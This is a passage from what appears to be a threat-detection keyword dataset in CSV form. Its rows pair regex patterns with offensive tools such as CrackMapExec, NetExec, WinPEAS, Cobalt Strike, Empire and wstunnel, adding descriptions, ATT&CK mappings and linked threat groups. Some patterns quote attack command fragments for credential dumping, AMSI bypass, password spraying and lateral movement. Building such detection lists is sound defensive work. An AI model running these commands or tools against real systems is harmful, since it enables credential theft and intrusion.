bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","3724" "* WINHELLO2hashcat.py*",".{0,1000}\sWINHELLO2hashcat\.py.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#linux #windows","N/A","10","1","75","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z","3725" "* win-key-killer.ps1*",".{0,1000}\swin\-key\-killer\.ps1.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","3726" "* WinPEAS - Windows local Privilege Escalation Awesome Script*",".{0,1000}\sWinPEAS\s\-\sWindows\slocal\sPrivilege\sEscalation\sAwesome\sScript.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","3727" "* -winPEAS *",".{0,1000}\s\-winPEAS\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy 
usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","3728" "* winPEAS.ps1*",".{0,1000}\swinPEAS\.ps1.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","3729" "* WinPirate.bat*",".{0,1000}\sWinPirate\.bat.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","3730" "* winpwnage.py*",".{0,1000}\swinpwnage\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","3731" "* winrm * -u * -p * --laps*",".{0,1000}\swinrm\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-laps.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3732" "* winrm * -u * -p * -X whoami*",".{0,1000}\swinrm\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-X\swhoami.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3733" "* winrm.py*",".{0,1000}\swinrm\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3734" "* wiRAT\Minner.exe*",".{0,1000}\swiRAT\\Minner\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","3735" "* --wldp-bypass=*",".{0,1000}\s\-\-wldp\-bypass\=.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","0","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","3739" "* --wmi *SELECT *",".{0,1000}\s\-\-wmi\s.{0,1000}SELECT\s.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3740" "* wmi_exec.exe*",".{0,1000}\swmi_exec\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","3741" "* wmiexec.py -k -no-pass 
*",".{0,1000}\swmiexec\.py\s\-k\s\-no\-pass\s.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","3742" "* wmiexec.py*",".{0,1000}\swmiexec\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3743" "* WMIHACKER.vbs*",".{0,1000}\sWMIHACKER\.vbs.{0,1000}","offensive_tool_keyword","WMIHACKER","Bypass anti-virus software lateral movement command execution test tool - No need 445 Port","T1047 - T1569.002 - T1218 - T1036.005","TA0008 - TA0002 - TA0005","N/A","N/A","Lateral Movement","https://github.com/rootclay/WMIHACKER","1","0","N/A","N/A","9","10","1423","236","2025-01-20T15:37:28Z","2020-07-02T06:57:25Z","3744" "* wmihacker_0.4.vbe*",".{0,1000}\swmihacker_0\.4\.vbe.{0,1000}","offensive_tool_keyword","WMIHACKER","Bypass anti-virus software lateral movement command execution test tool - No need 445 Port","T1047 - T1569.002 - T1218 - T1036.005","TA0008 - TA0002 - TA0005","N/A","N/A","Lateral 
Movement","https://github.com/rootclay/WMIHACKER","1","0","N/A","N/A","9","10","1423","236","2025-01-20T15:37:28Z","2020-07-02T06:57:25Z","3745" "* WMIHACKER_0.6.vbs*",".{0,1000}\sWMIHACKER_0\.6\.vbs.{0,1000}","offensive_tool_keyword","WMIHACKER","Bypass anti-virus software lateral movement command execution test tool - No need 445 Port","T1047 - T1569.002 - T1218 - T1036.005","TA0008 - TA0002 - TA0005","N/A","N/A","Lateral Movement","https://github.com/rootclay/WMIHACKER","1","0","N/A","N/A","9","10","1423","236","2025-01-20T15:37:28Z","2020-07-02T06:57:25Z","3746" "* --wmi-namespace 'root\cimv2'*",".{0,1000}\s\-\-wmi\-namespace\s\'root\\cimv2\'.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3747" "* wmirun=true dllpath=*.dll* computername=*",".{0,1000}\swmirun\=true\sdllpath\=.{0,1000}\.dll.{0,1000}\scomputername\=.{0,1000}","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral 
Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","N/A","7","1","77","12","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z","3748" "* -wordlist * -spawnto *",".{0,1000}\s\-wordlist\s.{0,1000}\s\-spawnto\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","3749" "* 
--wordlist=*.lst*",".{0,1000}\s\-\-wordlist\=.{0,1000}\.lst.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","3750" "* -word-list-path * -file-extensions *",".{0,1000}\s\-word\-list\-path\s.{0,1000}\s\-file\-extensions\s.{0,1000}","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","N/A","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","3751" "* -word-list-path tomatch.txt*",".{0,1000}\s\-word\-list\-path\stomatch\.txt.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","3752" "* -WorkingHours *",".{0,1000}\s\-WorkingHours\s.{0,1000}","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1065","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","3753" "* --wpad --lm --ProxyAuth --disable-ess**",".{0,1000}\s\-\-wpad\s\-\-lm\s\-\-ProxyAuth\s\-\-disable\-ess.{0,1000}.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","3754" "* 
wraith.py*",".{0,1000}\swraith\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","3755" "* wraith-server.py*",".{0,1000}\swraith\-server\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","3756" "* wraith-server_v*.py*",".{0,1000}\swraith\-server_v.{0,1000}\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","3757" "* WriteToLsass*",".{0,1000}\sWriteToLsass.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/WdToggle","1","0","N/A","N/A","10","10","219","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z","3758" "* ws://[::]:*",".{0,1000}\sws\:\/\/\[\:\:\]\:.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","3759" "* wsdd-discover.nse*",".{0,1000}\swsdd\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3760" "* ws-dirs.txt*",".{0,1000}\sws\-dirs\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","3761" "* ws-files.txt*",".{0,1000}\sws\-files\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","3762" "* WSManWinRM.js *",".{0,1000}\sWSManWinRM\.js\s.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","0","N/A","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","3763" "* WSManWinRM.ps1*",".{0,1000}\sWSManWinRM\.ps1.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","0","N/A","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","3764" "* WSPCoerce.cs*",".{0,1000}\sWSPCoerce\.cs.{0,1000}","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using 
MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tool","https://github.com/slemire/WSPCoerce","1","0","N/A","N/A","9","3","235","31","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z","3765" "* wss://0.0.0.0:*",".{0,1000}\swss\:\/\/0\.0\.0\.0\:.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","3766" "* wstunnel.exe*",".{0,1000}\swstunnel\.exe.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","3767" "* -X '$PSVersionTable' --amsi-bypass *",".{0,1000}\s\-X\s\'\$PSVersionTable\'\s\s\-\-amsi\-bypass\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3768" "* -X '$PSVersionTable' *",".{0,1000}\s\-X\s\'\$PSVersionTable\'\s.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3769" "* -x * --exec-method *",".{0,1000}\s\-x\s.{0,1000}\s\-\-exec\-method\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3770" "* -X '[System.Environment]::Is64BitProcess'*",".{0,1000}\s\-X\s\'\[System\.Environment\]\:\:Is64BitProcess\'.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3771" "* -X FUZZ http*",".{0,1000}\s\-X\sFUZZ\shttp.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","3772" "* -X whoami --obfs*",".{0,1000}\s\-X\swhoami\s\-\-obfs.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3773" "* -x -z --get-users-list*",".{0,1000}\s\-x\s\-z\s\-\-get\-users\-list.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","3774" "* -x -z -s 3 -j 1 -u *.txt*",".{0,1000}\s\-x\s\-z\s\-s\s3\s\-j\s1\s\-u\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying 
